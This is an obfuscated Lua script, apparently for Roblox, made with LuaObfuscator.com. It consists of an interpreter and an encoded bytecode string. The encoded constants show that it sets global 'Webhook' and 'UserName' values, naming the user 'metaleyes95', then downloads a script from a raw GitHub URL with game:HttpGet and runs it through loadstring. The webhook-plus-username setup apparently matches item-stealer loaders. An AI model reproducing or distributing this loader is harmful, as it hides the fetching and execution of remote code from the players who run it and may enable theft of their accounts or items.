--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=(v31/(2^(v32-(2 -1))))%((5 -(1 + 2))^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + (941 -(282 + 595)))))) ;return v82-(v82%1) ;else local v83=(2568 -(1523 + 114)) -(857 + 74) ;local v84;while true do if (v83==0) then v84=(570 -(367 + 201))^(v32-1) ;return (((v31%(v84 + v84))>=v84) and (928 -(214 + 713))) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 + 0 ;local v35;local v36;local v37;local v38;while true do if (v34==(1 -0)) then return (v38 * 16777216) + (v37 * (66601 -(68 + 997))) + (v36 * (1526 -(226 + 1044))) + v35 ;end if (v34==0) then v35,v36,v37,v38=v1(v16,v19,v19 + 3 );v19=v19 + (17 -13) ;v34=(116 + 2) -(32 + 85) ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 -0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v39==(307 -(244 + 60))) then local v90=0;while true do if (v90==1) then v39=1373 -(243 + 1126) ;break;end if (v90==0) then v46=nil;v47=nil;v90=1;end end end if (v39~=(1 + 0)) then else local v91=1636 -(1373 + 263) ;while true do if (v91==(1 + 0)) then v39=1127 -(936 + 189) ;break;end if (v91~=(1000 -(451 + 549))) then else v42=nil;v43=nil;v91=1;end end end if ((2 + 2)~=v39) then else while true do if (v40~=0) then else local v99=0 -0 ;while true do if (v99==(1 -0)) then v40=1385 -(746 + 638) ;break;end if (v99~=(0 + 0)) then else local v108=0 -0 ;while true do if (v108==(341 -(218 + 123))) then v41=0 + 0 ;v42=nil;v108=1139 -(782 + 356) ;end if (v108~=(268 -(176 + 91))) then else v99=1582 -(1535 + 46) ;break;end end end end end if (v40==(2 + 0)) then v45=nil;v46=nil;v40=3;end if (v40~=1) then else local v100=1092 -(975 + 117) ;while true do if ((1875 -(157 + 1718))==v100) then v43=nil;v44=nil;v100=1;end if (1==v100) then v40=2;break;end end end if (v40~=(1 + 2)) then else v47=nil;while true do local v101=560 -(306 + 254) ;local v102;local v103;while true do if (v101==(0 + 0)) then v102=0 -0 ;v103=nil;v101=1468 -(899 + 568) ;end if (v101==(1 + 0)) then while true do if (v102~=(0 -0)) then else v103=0 -0 ;while true do if (v103==(1 -0)) then if (v41~=(606 -(268 + 335))) then else local v178=0 + 0 ;local v179;local v180;while true do if (v178~=(1 -0)) then else while true do if (v179==(0 -0)) then v180=290 -(60 + 230) ;while true do if (v180==(572 -(426 + 146))) then local v196=0 + 0 ;while true do if (v196~=(1456 -(282 + 1174))) then else local v202=1189 -(449 + 740) ;while true do if (v202~=(811 -(569 + 242))) then else for v212=2 -1 ,v24() do v43[v212-1 ]=v29();end return v45;end end end end end end break;end end break;end if (v178~=(0 + 0)) then else v179=1024 -(706 + 318) ;v180=nil;v178=1252 -(721 + 530) ;end end end if (v41~=(949 -(245 + 702))) then else local v181=0;local v182;while true do if (v181==(1271 -(945 + 326))) then v182=0 -0 ;while true do if (v182==(1 + 0)) then for v185=1,v24() do local v186=0 + 0 ;local v187;local v188;while true do if (v186~=1) then else while true do if ((700 -(271 + 429))==v187) then v188=v22();if (v21(v188,1 + 0 ,1)==(1500 -(1408 + 92))) then local v205=0 -0 ;local v206;local v207;local v208;local v209;while true do if (v205==(1086 -(461 + 625))) then local v216=0;local v217;while true do if ((0 + 0)==v216) then v217=0 -0 ;while true do if (v217==(0 -0)) then local v235=1288 -(993 + 295) ;while true do if (v235==(1205 -(902 + 303))) then v206=0 + 0 ;v207=nil;v235=1;end if (v235==(1172 -(418 + 753))) then v217=1 + 0 ;break;end end end if (v217~=(1 + 0)) then else v205=1 + 0 ;break;end end break;end end end if (v205~=(1692 -(1121 + 569))) then else while true do if (v206==(0 + 0)) then local v224=529 -(406 + 123) ;while true do if (v224~=(1770 -(1749 + 20))) then else v206=1 + 0 ;break;end if (v224~=(683 -(483 + 200))) then else v207=v21(v188,1324 -(1249 + 73) ,3);v208=v21(v188,4,3 + 3 );v224=1146 -(466 + 679) ;end end end if (v206==(2 -0)) then local v225=0 -0 ;local v226;while true do if (v225==(562 -(334 + 228))) then v226=0 -0 ;while true do if (v226==(1901 -(106 + 1794))) then v206=6 -3 ;break;end if (v226~=0) then else local v236=0 + 0 ;while true do if (v236==(1 -0)) then v226=1 + 0 ;break;end if (v236==0) then if (v21(v208,1 + 0 ,2 -1 )==(2 -1)) then v209[116 -(4 + 110) ]=v47[v209[4 -2 ]];end if (v21(v208,2,4 -2 )==1) then v209[3]=v47[v209[1 + 2 ]];end v236=585 -(57 + 527) ;end end end end break;end end end if (v206~=(1428 -(41 + 1386))) then else local v227=103 -(17 + 86) ;local v228;while true do if (v227~=(0 + 0)) then else v228=0 -0 ;while true do if (v228==(1 + 0)) then v206=5 -3 ;break;end if (v228==(0 + 0)) then local v237=166 -(122 + 44) ;while true do if ((164 -(92 + 71))==v237) then v228=1 + 0 ;break;end if (v237==0) then local v240=0 -0 ;while true do if (v240==(765 -(574 + 191))) then v209={v23(),v23(),nil,nil};if (v207==(849 -(254 + 595))) then local v245=0 + 0 ;while true do if (v245==0) then v209[3]=v23();v209[4]=v23();break;end end elseif (v207==(127 -(55 + 71))) then v209[3]=v24();elseif (v207==(2 -0)) then v209[1793 -(573 + 1217) ]=v24() -((5 -3)^(32 -16)) ;elseif (v207==(68 -(30 + 35))) then local v250=0 -0 ;local v251;while true do if ((0 + 0)~=v250) then else v251=0;while true do if (v251==(939 -(714 + 225))) then v209[1260 -(1043 + 214) ]=v24() -((7 -5)^(46 -30)) ;v209[1216 -(323 + 889) ]=v23();break;end end break;end end end v240=1;end if (v240==(1 -0)) then v237=2 -1 ;break;end end end end end end break;end end end if (v206==(583 -(361 + 219))) then if (v21(v208,3,3)==1) then v209[324 -(53 + 267) ]=v47[v209[4]];end v42[v185]=v209;break;end end break;end if (v205~=1) then else local v218=0 + 0 ;while true do if (v218==(806 -(118 + 688))) then v208=nil;v209=nil;v218=414 -(15 + 398) ;end if (v218==1) then v205=984 -(18 + 964) ;break;end end end end end break;end end break;end if ((0 -0)==v186) then v187=0 + 0 ;v188=nil;v186=1 + 0 ;end end end v41=853 -(20 + 830) ;break;end if (v182==0) then for v189=1 + 0 ,v46 do local v190=1886 -(927 + 959) ;local v191;local v192;local v193;local v194;local v195;while true do if (v190==2) then v195=nil;while true do if (v191~=(127 -(116 + 10))) then else local v203=0;while true do if (v203~=(1 + 0)) then else v191=740 -(542 + 196) ;break;end if (v203==0) then v194=nil;v195=nil;v203=1;end end end if (v191==(732 -(16 + 716))) then local v204=0;while true do if ((1 -0)~=v204) then else v191=1 -0 ;break;end if ((0 + 0)~=v204) then else v192=0 + 0 ;v193=nil;v204=1 + 0 ;end end end if (v191~=(4 -2)) then else while true do if (v192==0) then local v214=0 -0 ;local v215;while true do if (v214==(0 -0)) then v215=1796 -(503 + 1293) ;while true do if (v215~=(0 -0)) then else local v232=0;while true do if (v232==0) then v193=0 -0 ;v194=nil;v232=1552 -(1126 + 425) ;end if (v232~=(406 -(118 + 287))) then else v215=1062 -(810 + 251) ;break;end end end if (v215==(3 -2)) then v192=1122 -(118 + 1003) ;break;end end break;end end end if (v192==(2 -1)) then v195=nil;while true do if (v193==(377 -(142 + 235))) then local v220=0 -0 ;local v221;local v222;while true do if (v220==(0 + 0)) then v221=0 + 0 ;v222=nil;v220=534 -(43 + 490) ;end if (v220==(978 -(553 + 424))) then while true do if (v221~=(0 -0)) then else v222=0 + 0 ;while true do if (v222==(860 -(240 + 619))) then v193=1 + 0 ;break;end if (v222~=0) then else local v238=0 + 0 ;local v239;while true do if (v238==(0 + 0)) then v239=0;while true do if (v239~=(0 + 0)) then else v194=v22();v195=nil;v239=1 + 0 ;end if (v239==(1 + 0)) then v222=2 -1 ;break;end end break;end end end end break;end end break;end end end if (v193==(2 -1)) then if (v194==1) then v195=v22()~=(405 -(255 + 150)) ;elseif (v194==(2 + 0)) then v195=v25();elseif (v194==(6 -3)) then v195=v26();end v47[v189]=v195;break;end end break;end end break;end end break;end if (v190==(0 + 0)) then v191=0;v192=nil;v190=4 -3 ;end if (v190~=(754 -(239 + 514))) then else v193=nil;v194=nil;v190=1 + 1 ;end end end v45[1332 -(797 + 532) ]=v22();v182=407 -(183 + 223) ;end end break;end end end break;end if (v103==(0 -0)) then local v176=0 + 0 ;local v177;while true do if ((0 + 0)~=v176) then else v177=337 -(10 + 327) ;while true do if (v177==(1 + 0)) then v103=2 -1 ;break;end if (v177==0) then local v183=0;while true do if (v183==(1202 -(373 + 829))) then if (v41==(731 -(476 + 255))) then local v197=0 + 0 ;local v198;while true do if (v197~=(1130 -(369 + 761))) then else v198=338 -(118 + 220) ;while true do if (v198~=0) then else local v210=0;local v211;while true do if (v210~=0) then else v211=0 + 0 ;while true do if (v211==(0 + 0)) then local v230=0 + 0 ;while true do if (v230~=(1 -0)) then else v211=1 -0 ;break;end if (v230==(1493 -(711 + 782))) then v42={};v43={};v230=1;end end end if (v211==(1 -0)) then v198=239 -(64 + 174) ;break;end end break;end end end if (v198==(1 + 0)) then v44={};v41=1 -0 ;break;end end break;end end end if (v41==(337 -(144 + 192))) then local v199=216 -(42 + 174) ;local v200;local v201;while true do if ((1819 -(580 + 1239))~=v199) then else v200=0;v201=nil;v199=1 + 0 ;end if (v199==(1 + 0)) then while true do if (v200==(0 + 0)) then v201=1504 -(363 + 1141) ;while true do if (v201~=1) then else v47={};v41=2;break;end if (v201==0) then local v219=1580 -(1183 + 397) ;while true do if (v219==(0 -0)) then local v231=0 -0 ;while true do if (v231==(1 + 0)) then v219=1 + 0 ;break;end if (v231==0) then v45={v42,v43,nil,v44};v46=v24();v231=2 -1 ;end end end if (v219~=(1 + 0)) then else v201=2 -1 ;break;end end end end break;end end break;end end end v183=1 -0 ;end if (v183==1) then v177=506 -(351 + 154) ;break;end end end end break;end end end end break;end end break;end end end break;end end break;end if (v39==(1933 -(565 + 1368))) then v40=0 -0 ;v41=nil;v39=1662 -(1477 + 184) ;end if (v39==(2 -0)) then local v92=266 -(28 + 238) ;while true do if ((1 + 0)==v92) then v39=6 -3 ;break;end if (v92~=(856 -(564 + 292))) then else v44=nil;v45=nil;v92=1 -0 ;end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=v24();local v49=v24();local v50=1560 -(1381 + 178) ;local v51=(v21(v49,3 -2 ,19 + 1 ) * (2^(26 + 6))) + v48 ;local v52=v21(v49,9 + 12 ,106 -75 );local v53=((v21(v49,17 + 15 )==(3 -2)) and  -(471 -(381 + 89))) or (1 + 0) ;if (v52==((0 -0) + 0)) then if (v51==(0 -0)) then return v53 * (1156 -((1355 -281) + 82)) ;else v52=3 -2 ;v50=1994 -(109 + 1885) ;end elseif (v52==((663 + 3822) -(1874 + 564))) then return ((v51==(1784 -(214 + 1570))) and (v53 * ((1456 -(990 + 465))/(0 + 0 + 0)))) or (v53 * NaN) ;end return v8(v53,v52-(1849 -(173 + 629 + 24)) ) * (v50 + (v51/((1 + 1)^52))) ;end v26=nil;function v26(v54)local v55=0 -0 ;local v56;local v57;while true do if (v55==((6 -3) -2)) then v56=v3(v16,v19,(v19 + v54) -(1 + 0 + 0) );v19=v19 + v54 ;v55=2;end if (((0 + 0) -0)==v55) then v56=nil;if  not v54 then v54=v24();if (v54==(0 + 0)) then return "";end end v55=1620 -(1427 + 192) ;end if (v55==(2 + 0)) then v57={};for v93=327 -(192 + 134) , #v56 do v57[v93]=v2(v1(v3(v56,v93,v93)));end v55=(1279 -(316 + 960)) + 0 ;end if (v55==3) then return v6(v57);end end end v18=5;end if (v18==2) then function v22()local v58=v1(v16,v19,v19);v19=v19 + 1 ;return v58;end v23=nil;function v23()local v59,v60=v1(v16,v19,v19 + 2 + 0 );v19=v19 + 2 + 0 ;return (v60 * 256) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v61,16));if v20 then local v104=v5(v86,v20);v20=nil;return v104;else return v86;end break;end end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=6) then if (v81<=2) then if (v81<=0) then v72=v80[3];elseif (v81==1) then local v109=0;local v110;local v111;local v112;local v113;local v114;while true do if (v109==9) then v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];break;end if (v109==5) then v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3]~=0 ;v72=v72 + 1 ;v109=6;end if (v109==8) then v114=v80[2];v78[v114]=v78[v114](v13(v78,v114 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v109=9;end if (v109==4) then v78[v114]=v113[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v109=5;end if (v109==2) then v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v64[v80[3]];v72=v72 + 1 ;v109=3;end if (v109==3) then v80=v68[v72];v114=v80[2];v113=v78[v80[3]];v78[v114 + 1 ]=v113;v109=4;end if (v109==6) then v80=v68[v72];v114=v80[2];v111,v112=v71(v78[v114](v13(v78,v114 + 1 ,v80[3])));v73=(v112 + v114) -1 ;v109=7;end if (v109==1) then v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v64[v80[3]];v109=2;end if (v109==0) then v110=nil;v111,v112=nil;v113=nil;v114=nil;v109=1;end if (v109==7) then v110=0;for v173=v114,v73 do v110=v110 + 1 ;v78[v173]=v111[v110];end v72=v72 + 1 ;v80=v68[v72];v109=8;end end else local v115=0;local v116;local v117;while true do if (0==v115) then v116=v80[2];v117=v78[v80[3]];v115=1;end if (1==v115) then v78[v116 + 1 ]=v117;v78[v116]=v117[v80[4]];break;end end end elseif (v81<=4) then if (v81>3) then v78[v80[2]]=v80[3];else v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v64[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v72=v80[3];end elseif (v81>5) then local v126=v80[2];local v127,v128=v71(v78[v126](v13(v78,v126 + 1 ,v80[3])));v73=(v128 + v126) -1 ;local v129=0;for v135=v126,v73 do v129=v129 + 1 ;v78[v135]=v127[v129];end elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=9) then if (v81<=7) then v78[v80[2]][v80[3]]=v80[4];elseif (v81>8) then v78[v80[2]]=v80[3]~=0 ;else local v131=v80[2];v78[v131]=v78[v131](v13(v78,v131 + 1 ,v73));end elseif (v81<=11) then if (v81==10) then v78[v80[2]]();else do return;end end elseif (v81>12) then v78[v80[2]]=v64[v80[3]];else for v138=v80[2],v80[3] do v78[v138]=nil;end end v72=v72 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03013O0020030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030B3O006D6574616C65796573393503093O00557365724E616D653200253O0012043O00014O000C000100013O0026053O00020001000100044O00020001001204000100013O002605000100120001000200044O0012000100120D000200033O00300100020004000500122O000200063O00122O000300073O00202O00030003000800122O000500096O000600016O000300066O00023O00024O00020001000100044O00240001002605000100050001000100044O00050001001204000200013O002605000200190001000200044O00190001001204000100023O00044O00050001002605000200150001000100044O0015000100120D000300033O0030030003000A000B00122O000300033O00302O0003000C000B00122O000200023O00044O0015000100044O0005000100044O0024000100044O000200012O000B3O00017O00",v9(),...);end
